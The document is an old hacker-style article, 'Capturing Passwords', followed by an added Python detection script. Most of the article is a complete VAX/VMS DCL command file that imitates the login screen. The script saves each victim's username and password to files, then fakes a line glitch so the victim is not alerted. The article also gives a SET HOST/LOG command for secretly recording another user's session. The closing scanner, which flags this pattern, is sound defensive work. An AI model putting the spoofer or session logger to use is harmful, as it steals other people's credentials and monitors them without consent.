Capturing Passwords

by Texas Toad

If you are already a user on a VAX/VMS system, it would often be handy to have the account names and passwords of other users of the system.

In order to get additional names and passwords, I wrote the DEC Control Language (DCL) command file below. It simulates the normal login screen on a VT100 or compatible terminal, writes the user's account name and password to a file in your account, and then aborts as if a line glitch had occurred.

The user who enters his name and password should not be suspicious, since the login appears to abort from natural causes.  In the event that he/she is, however, the Ctrl+B+Tab command sequence defined will force an exit from the network or host system before control is passed back to the user.  Note that the Ctrl+B+Tab sequence is system-specific and should be whatever characters are used on your system to disconnect the terminal or process from the host computer.

The files USER.TST and PASS.TST contain the user's login name and password, respectively.

Another handy trick is shown below...

This command creates a file in your account which will subsequently capture all the activity occurring at your terminal.  Any keystrokes, any commands, all the actions done at the keyboard will be logged in the file while still appearing at the terminal as normal.

$ SET HOST/LOG=filename 0

Be sure to include a legal VMS filename and be sure to include the zero following the filename.

Once the user or whoever logs off, system control returns to the account from which the above command was given.  At that point, the file specified holds the contents of the session.

It may be necessary, if you want to edit the file with EDT or a standard text file editor, to run the following command:

$ MCR REF

This will convert non-ASCII control sequences (like terminal control characters) to spelled-out ASCII codes (like ESC for the Escape key).  The file can then be examined at will.

Interested in more VAX goodies?  Have terminal will travel.

$ SET NOCONTROL_Y
$ INQUIRE/NOPUNCTUATION RETURN "2J"  # Use if you are connected by a LAN to your VAX.
$ TYPE SYS$INPUT

(You may now enter Net/One commands.)

$ INQUIRE/NOPUNCTUATION GREATER ">"
$ TYPE SYS$INPUT
connecting...(1) 16169b6 success
$ INQUIRE/NOPUNCTUATION NULL ""  # Use if you are connected by a LAN to your VAX.
$ WRITE SYSA$OUTPUT "2J"
$ WRITE SYSA$OUTPUT "10;0H"
$ TYPE SYS$INPUT

(This is where your particular login message goes.)

$ INQUIRE Username "Username"
$ SET TERM/NOECHO
$ INQUIRE Password "Password"
$ OPEN/WRITE OUTFILE PASS.TST
$ WRITE OUTFILE Password
$ CLOSE OUTFILE
$ OPEN/WRITE OUTER USER.TST
$ WRITE OUTER USERNAME
$ CLOSE OUTER
$ TYPE SYS$INPUT
User authorization failure
$ ! WAIT 00:00:05
$ CTRL_B[0,7] = %00002
$ TAB[0,7] = %00011
$ CTRL_B_TAB = CTRL_B + TAB
$ WRITE SYS$OUTPUT CTRL_B_TAB
$ EXIT

PASS.TST will contain the password of the user.

USER.TST will contain the name of the user.
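
Seen from the administrator's side, the listing above has a recognizable shape: a value read with INQUIRE while terminal echo is off is later written to a file opened with OPEN/WRITE. The Python scanner below is an added example, not part of the original article, that flags that shape in DCL command files; the function name scan_dcl, both sample procedures and the heuristic itself are constructed for illustration and will miss procedures that build the value indirectly.

```python
import re

# Constructed samples (not from a real system): a procedure in the style of the
# listing above, and a benign one that also prompts and writes a file.
SUSPECT = """$ SET NOCONTROL_Y
$ INQUIRE Username "Username"
$ SET TERM/NOECHO
$ INQUIRE Password "Password"
$ OPEN/WRITE OUTFILE PASS.TST
$ WRITE OUTFILE Password
$ CLOSE OUTFILE
"""
BENIGN = """$ INQUIRE Name "Report name"
$ OPEN/WRITE RPT REPORT.LIS
$ WRITE RPT "Report for ", Name   ! echoed input, not a secret
$ CLOSE RPT
"""

def scan_dcl(text):
    """Return findings for hidden-input symbols that are written to a file."""
    echo_off, hidden, channels, findings = False, set(), {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # Drop "!" comments outside quoted strings, the leading "$", and case.
        line = re.sub(r'("[^"]*")|!.*', lambda m: m.group(1) or "", raw)
        line = line.strip().lstrip("$").strip().upper()
        if re.match(r"SET\s+NOCONTROL", line):
            findings.append((lineno, "interrupt disabled (supporting indicator)"))
        elif re.match(r"SET\s+TERM\w*.*/NOECHO", line):
            echo_off = True
        elif re.match(r"SET\s+TERM\w*.*/ECHO", line):
            echo_off = False
        elif m := re.match(r"INQ\w*(?:/\w+)*\s+([\w$]+)", line):
            if echo_off:
                hidden.add(m.group(1))      # value typed with echo disabled
        elif m := re.match(r"OPEN\S*/(?:WRITE|APPEND)\S*\s+([\w$]+)\s+(\S+)", line):
            channels[m.group(1)] = m.group(2)
        elif m := re.match(r"WRITE(?:/\w+)*\s+([\w$]+)\s+(.*)", line):
            chan, expr = m.groups()
            symbols = set(re.findall(r"[\w$]+", re.sub(r'"[^"]*"', "", expr)))
            for sym in sorted(symbols & hidden):
                if chan in channels:
                    findings.append((lineno, f"{sym} written to {channels[chan]}"))
    return findings

if __name__ == "__main__":
    for name, sample in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(name, scan_dcl(sample))
```

The benign sample also prompts and writes to a file, but its input is read with echo on, so it produces no finding.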
